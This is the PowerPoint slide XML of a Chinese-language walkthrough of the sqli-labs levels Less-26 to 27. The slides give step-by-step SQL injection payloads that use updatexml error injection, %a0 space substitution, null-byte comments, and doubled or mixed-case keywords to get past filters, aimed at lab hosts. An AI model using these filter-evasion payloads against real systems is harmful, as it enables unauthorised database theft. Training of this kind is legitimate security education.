            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-26/?id=1‘ union select 1,2,3;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>报错，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>tips</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>发现，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>之间没有空格</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下因为转码问题，无法使用空格替换的情况。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>7.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>先不管空格替换的情况，先使用报错注入进行测试。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="927616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287674"/>
            <a:ext cx="10131425" cy="260644"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-26_02</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当我们不考虑空格，使用报错注入的时候：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. http://121.199.30.46/Less-26/?id=1‘  || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(0x7e, ( database()  ) ),1)  || ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用这种方式可以得到我们的当前数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2.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 = 0x7365637572697479)  ) ),1)  || ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 这样我们可以取得表信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3.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 = 0x7573657273)  ) ),1) || ’1‘=‘1   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过这个我们取得字段的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4.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 ),1) || ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>取出字段的值，但是取出的值很少，不完整。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5.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where (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>) ) )   ,1) || ’1‘=‘1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过改变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的值可以遍历所有的数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>以上的方法中，因为不能使用空格，所以采用报错注入的形式。我们如果使用字符进行替换呢？将空格替换为编码字符如何解决？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12310529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6238-CA7E-4143-97E7-FD9E8E73F7D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1875973" y="406401"/>
            <a:ext cx="10131425" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-26_03</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC64A9B2-882E-4900-B0D4-6D4436685509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275772" y="1190171"/>
            <a:ext cx="11321142" cy="5370286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>参考链接：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.w3school.com.cn/tags/html_ref_urlencode.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>当我们使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>充当空格替换的时候：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://121.199.30.46/Less-26/?id=1' %a0%a0%a0%a0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>oorrder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> %a0by%a0;%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>这个时候我们直接将所有的空格进行替换即可，注释符可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>;%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或者是使用  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>|| ‘1’=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>即可完成注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2328995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360245"/>
            <a:ext cx="10131425" cy="260644"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-26_04</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自写一个脚本判断有哪些符合要求的替换空格的编码：</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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5F224C2-EF6A-4D3F-8653-D3013B9D79D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1814286"/>
            <a:ext cx="8971428" cy="2828571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3CA5690-84BD-4072-8817-582647429D4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9575337" y="1115650"/>
            <a:ext cx="2411566" cy="5382105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42140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2B1986-C22A-4B1A-A99E-1030AC9D4444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>代码中，加入以下：</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82D36F19-F56A-4BD8-B320-7D8B3CBD8674}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2047299" y="290945"/>
            <a:ext cx="8769927" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>提示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3010510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Less-26a</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http://127.0.0.1/sqli/Less-26a/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>返回数据正常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/Less-26a/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时没有数据返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3.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/Less-26a/?id=1’) ;%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时我们可以得到返回正常的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的原因，我们使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>搭建的靶机进行接下来的操作：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>代码中  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>print_r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>()); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>屏蔽了返回的错误，所以这里我们不能使用报错注入。我们使用联合查询注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. http://47.100.118.240:8888/Less-26a/?id=111‘) %a0 union %a0 select %a0  1,2,3;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>直接将所有的空格替换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%a0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>hint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>得到可以回显的位置。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>特别感谢网络上无偿提供搭建环境的人，感谢您的帮助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. http://47.100.118.240:8888/Less-26a/?id=111‘) %a0 union %a0 select %a0  1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)  %a0 from %a0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>infoorrmation_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>     ;%00  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>获取所有的数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>记得空格使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行替换，不要直接复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，因为里面的英文逗号会被转成中文的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3760787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838902" y="402834"/>
            <a:ext cx="10131425" cy="303747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-27_01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fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>为了测试方便，我们在代码中加入：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>echo "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>1.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有数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>2.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此时报错，说明可能存在注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://47.100.118.240:8888/Less-27/?id=1‘;%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>成功将单引号进行闭合掉，说明存在注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>4. http://47.100.118.240:8888/Less-27/?id=1‘   %a0 order %a0  by  %a0  3    ;%00  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>hint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>可以进行这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>5. http://47.100.118.240:8888/Less-27/?id=1‘   %a0 union  %a0  select  %a0 1, 2, 3    ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>此时返回错误，我们看下源码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>等关键字被替换为空，我们尝试大小写混合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>6. http://47.100.118.240:8888/Less-27/?id=1‘   %a0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>uNion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>  %a0  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>sElect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>  %a0 1, 2, 3    ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>此时返回正常数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>7. http://47.100.118.240:8888/Less-27/?id=111‘   %a0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>uNion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
